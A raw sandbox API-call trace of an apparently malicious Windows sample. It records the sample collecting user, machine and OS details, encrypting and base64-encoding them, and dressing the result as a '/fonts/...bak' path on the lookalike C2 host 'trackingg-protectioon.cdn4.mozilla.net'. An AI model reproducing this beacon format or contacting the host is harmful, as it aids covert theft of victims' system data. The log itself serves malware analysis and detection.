[0170.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHkq0I08toJRZty2tDaiJ/4jQnUzk", lpUsedDefaultChar=0x0) returned 20 [0170.609] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0170.610] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0170.610] lstrlenA (lpString="trackingg-protectioon.cdn4.mozilla.net") [0170.610] lstrlenA (lpString="trackingg-protectioon.cdn4.mozilla.net") returned 38 [0170.610] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x27) returned 0x2c59a68 [0170.610] memcpy (in: _Dst=0x2c59a68, _Src=0x2c59e18, _Size=0x26 | out: _Dst=0x2c59a68) returned 0x2c59a68 [0170.610] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0170.610] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5f238 [0170.610] GetTickCount () returned 0x1aeeef9 [0170.610] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xa) returned 0x2c5ea50 [0170.610] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x6) returned 0x2c59b28 [0170.610] lstrlenA (lpString="%s=%s&") returned 6 [0170.611] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15) returned 0x2c59b38 [0170.611] sprintf (in: _Dest=0x2c59b38, _Format="%s=%s&" | out: _Dest="ekcbl=tnqxnipqi&") returned 16 [0170.611] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0170.611] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0170.611] lstrlenA (lpString="ekcbl=tnqxnipqi&") returned 16 [0170.611] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28435&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0170.611] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd6) returned 0x2c59b58 [0170.611] strcpy (_Dest=0x2c59b58, _Source="ekcbl=tnqxnipqi&") [0170.611] strcpy (in: _Dest=0x2c59b58, _Source="ekcbl=tnqxnipqi&" | out: _Dest="ekcbl=tnqxnipqi&") returned="ekcbl=tnqxnipqi&" [0170.611] lstrcatA (lpString1="ekcbl=tnqxnipqi&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28435&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0170.611] lstrcatA (in: lpString1="ekcbl=tnqxnipqi&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28435&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="ekcbl=tnqxnipqi&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28435&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="ekcbl=tnqxnipqi&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28435&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0170.611] lstrlenA (lpString="ekcbl=tnqxnipqi&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28435&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 213 [0170.611] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0170.611] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0170.613] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0170.613] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0170.613] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d378) returned 1 [0170.613] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0170.614] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0170.614] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c38 [0170.614] memcpy (in: _Dst=0x2c59c38, _Src=0x2c59b58, _Size=0x10 | out: _Dst=0x2c59c38) returned 0x2c59c38 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.614] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x10 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0170.614] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.615] memcpy (in: _Dst=0x2c59ce8, _Src=0x2c59c08, _Size=0x10 | out: _Dst=0x2c59ce8) returned 0x2c59ce8 [0170.615] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.615] memcpy (in: _Dst=0x2c59cf8, _Src=0x2c59c18, _Size=0x10 | out: _Dst=0x2c59cf8) returned 0x2c59cf8 [0170.615] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.615] memcpy (in: _Dst=0x2c59d08, _Src=0x2c59c28, _Size=0x6 | out: _Dst=0x2c59d08) returned 0x2c59d08 [0170.615] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59d08*, pdwDataLen=0x11ff074*=0x6, dwBufLen=0x20 | out: pbData=0x2c59d08*, pdwDataLen=0x11ff074*=0x10) returned 1 [0170.615] CryptDestroyKey (hKey=0x77d378) returned 1 [0170.615] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0170.615] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0170.615] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa40 [0170.616] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c38 | out: hHeap=0x2860000) returned 1 [0170.616] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b58 | out: hHeap=0x2860000) returned 1 [0170.616] StrTrimA (psz="anvl4DF57tbvO3Ek6luLQbT8hJCj0Cwe5R/sSEW/6mAdqS/BQBTM3A38e16lxOdem/C9BREt8qjmv3slYYsziWz+6XrVHYYP/q5AQfH7PJXFoADIkENXDGD2u4eMPVjQpYmRy3tHLEhmzmi1MOw7Vb8P12dt1Aw0cbB0md+stSCYJtjAHr6yz74VOTpMLOHoXai9eH1oFs5eImjlJCAa7Te7xSKcIVA3itFTqdSvr6bMZ2mKJNhDPnfDlpWVt5zhXu+iWPl8pSWHhoQsLr0VpyL6TtA5O7rEool8FvAWpms=", pszTrimChars="\r\n=") [0170.617] StrTrimA (in: psz="anvl4DF57tbvO3Ek6luLQbT8hJCj0Cwe5R/sSEW/6mAdqS/BQBTM3A38e16lxOdem/C9BREt8qjmv3slYYsziWz+6XrVHYYP/q5AQfH7PJXFoADIkENXDGD2u4eMPVjQpYmRy3tHLEhmzmi1MOw7Vb8P12dt1Aw0cbB0md+stSCYJtjAHr6yz74VOTpMLOHoXai9eH1oFs5eImjlJCAa7Te7xSKcIVA3itFTqdSvr6bMZ2mKJNhDPnfDlpWVt5zhXu+iWPl8pSWHhoQsLr0VpyL6TtA5O7rEool8FvAWpms=", pszTrimChars="\r\n=" | out: psz="anvl4DF57tbvO3Ek6luLQbT8hJCj0Cwe5R/sSEW/6mAdqS/BQBTM3A38e16lxOdem/C9BREt8qjmv3slYYsziWz+6XrVHYYP/q5AQfH7PJXFoADIkENXDGD2u4eMPVjQpYmRy3tHLEhmzmi1MOw7Vb8P12dt1Aw0cbB0md+stSCYJtjAHr6yz74VOTpMLOHoXai9eH1oFs5eImjlJCAa7Te7xSKcIVA3itFTqdSvr6bMZ2mKJNhDPnfDlpWVt5zhXu+iWPl8pSWHhoQsLr0VpyL6TtA5O7rEool8FvAWpms") returned 1 [0170.617] lstrlenA (lpString="anvl4DF57tbvO3Ek6luLQbT8hJCj0Cwe5R/sSEW/6mAdqS/BQBTM3A38e16lxOdem/C9BREt8qjmv3slYYsziWz+6XrVHYYP/q5AQfH7PJXFoADIkENXDGD2u4eMPVjQpYmRy3tHLEhmzmi1MOw7Vb8P12dt1Aw0cbB0md+stSCYJtjAHr6yz74VOTpMLOHoXai9eH1oFs5eImjlJCAa7Te7xSKcIVA3itFTqdSvr6bMZ2mKJNhDPnfDlpWVt5zhXu+iWPl8pSWHhoQsLr0VpyL6TtA5O7rEool8FvAWpms") returned 299 [0170.617] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc08 [0170.617] _snprintf (in: _Dest=0x2c5fc2a, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0170.617] _snprintf (in: _Dest=0x2c5fc31, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0170.617] _snprintf (in: _Dest=0x2c5fc3a, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0170.617] _snprintf (in: _Dest=0x2c5fc4f, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0170.617] _snprintf (in: _Dest=0x2c5fc67, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0170.617] _snprintf (in: _Dest=0x2c5fc72, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0170.617] _snprintf (in: _Dest=0x2c5fcba, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0170.617] _snprintf (in: _Dest=0x2c5fd18, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0170.617] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0170.619] lstrlenA (lpString="anvl4DF57tbvO3Ek6luLQbT8hJCj0Cwe5R_2FsSEW_2F6mAdqS_2FBQBTM3A38e16lxOdem_2FC9BREt8qjmv3slYYsziWz_2B6XrVHYYP_2Fq5AQfH7PJXFoADIkENXDGD2u4eMPVjQpYmRy3tHLEhmzmi1MOw7Vb8P12dt1Aw0cbB0md_2BstSCYJtjAHr6yz74VOTpMLOHoXai9eH1oFs5eImjlJCAa7Te7xSKcIVA3itFTqdSvr6bMZ2mKJNhDPnfDlpWVt5zhXu_2BiWPl8pSWHhoQsLr0VpyL6TtA5O7rEool8FvAWpms") returned 315 [0170.619] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x163) returned 0x2c5fa40 [0170.619] memcpy (in: _Dst=0x2c5fa40, _Src=0x2c5fc08, _Size=0xb | out: _Dst=0x2c5fa40) returned 0x2c5fa40 [0170.619] memcpy (in: _Dst=0x2c5fa4c, _Src=0x2c5fc13, _Size=0xe | out: _Dst=0x2c5fa4c) returned 0x2c5fa4c [0170.619] memcpy (in: _Dst=0x2c5fa5b, _Src=0x2c5fc21, _Size=0x15 | out: _Dst=0x2c5fa5b) returned 0x2c5fa5b [0170.619] memcpy (in: _Dst=0x2c5fa71, _Src=0x2c5fc36, _Size=0x10 | out: _Dst=0x2c5fa71) returned 0x2c5fa71 [0170.619] memcpy (in: _Dst=0x2c5fa82, _Src=0x2c5fc46, _Size=0xf | out: _Dst=0x2c5fa82) returned 0x2c5fa82 [0170.619] memcpy (in: _Dst=0x2c5fa92, _Src=0x2c5fc55, _Size=0x12 | out: _Dst=0x2c5fa92) returned 0x2c5fa92 [0170.619] memcpy (in: _Dst=0x2c5faa5, _Src=0x2c5fc67, _Size=0x9 | out: _Dst=0x2c5faa5) returned 0x2c5faa5 [0170.619] memcpy (in: _Dst=0x2c5faaf, _Src=0x2c5fc70, _Size=0x14 | out: _Dst=0x2c5faaf) returned 0x2c5faaf [0170.619] memcpy (in: _Dst=0x2c5fac4, _Src=0x2c5fc84, _Size=0x13 | out: _Dst=0x2c5fac4) returned 0x2c5fac4 [0170.619] memcpy (in: _Dst=0x2c5fad8, _Src=0x2c5fc97, _Size=0x16 | out: _Dst=0x2c5fad8) returned 0x2c5fad8 [0170.619] memcpy (in: _Dst=0x2c5faef, _Src=0x2c5fcad, _Size=0xd | out: _Dst=0x2c5faef) returned 0x2c5faef [0170.619] memcpy (in: _Dst=0x2c5fafd, _Src=0x2c5fcba, _Size=0x8 | out: _Dst=0x2c5fafd) returned 0x2c5fafd [0170.619] memcpy (in: _Dst=0x2c5fb06, _Src=0x2c5fcc2, _Size=0x17 | out: _Dst=0x2c5fb06) returned 0x2c5fb06 [0170.619] memcpy (in: _Dst=0x2c5fb1e, _Src=0x2c5fcd9, _Size=0xa | out: _Dst=0x2c5fb1e) returned 0x2c5fb1e [0170.619] memcpy (in: _Dst=0x2c5fb29, _Src=0x2c5fce3, _Size=0x11 | out: _Dst=0x2c5fb29) returned 0x2c5fb29 [0170.619] memcpy (in: _Dst=0x2c5fb3b, _Src=0x2c5fcf4, _Size=0xc | out: _Dst=0x2c5fb3b) returned 0x2c5fb3b [0170.619] memcpy (in: _Dst=0x2c5fb48, _Src=0x2c5fd00, _Size=0xb | out: _Dst=0x2c5fb48) returned 0x2c5fb48 [0170.619] memcpy (in: _Dst=0x2c5fb54, _Src=0x2c5fd0b, _Size=0xe | out: _Dst=0x2c5fb54) returned 0x2c5fb54 [0170.619] memcpy (in: _Dst=0x2c5fb63, _Src=0x2c5fd19, _Size=0x15 | out: _Dst=0x2c5fb63) returned 0x2c5fb63 [0170.619] memcpy (in: _Dst=0x2c5fb79, _Src=0x2c5fd2e, _Size=0x13 | out: _Dst=0x2c5fb79) returned 0x2c5fb79 [0170.619] memcpy (in: _Dst=0x2c5fb8d, _Src=0x2c5fd41, _Size=0x3 | out: _Dst=0x2c5fb8d) returned 0x2c5fb8d [0170.620] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc08 | out: hHeap=0x2860000) returned 1 [0170.620] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b38 | out: hHeap=0x2860000) returned 1 [0170.620] StrTrimA (in: psz="anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms", pszTrimChars="\r\n" | out: psz="anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms") returned 0 [0170.620] lstrlenA (lpString="/fonts/") returned 7 [0170.620] lstrlenA (lpString="anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms") returned 335 [0170.620] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x157) returned 0x2c59b28 [0170.620] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0170.620] lstrcatA (in: lpString1="/fonts/", lpString2="anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms" | out: lpString1="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms") returned="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms" [0170.620] lstrcpyA (in: lpString1=0x2c5fa40, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0170.620] lstrcpyA (in: lpString1=0x2c5f238, lpString2="trackingg-protectioon.cdn4.mozilla.net" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net") returned="trackingg-protectioon.cdn4.mozilla.net" [0170.620] lstrcatA (in: lpString1="trackingg-protectioon.cdn4.mozilla.net", lpString2="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms") returned="trackingg-protectioon.cdn4.mozilla.net/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms" [0170.620] lstrcatA (in: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms", lpString2=".bak" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak") returned="trackingg-protectioon.cdn4.mozilla.net/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak" [0170.620] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0170.620] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0170.620] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3a0 [0170.620] lstrlenA 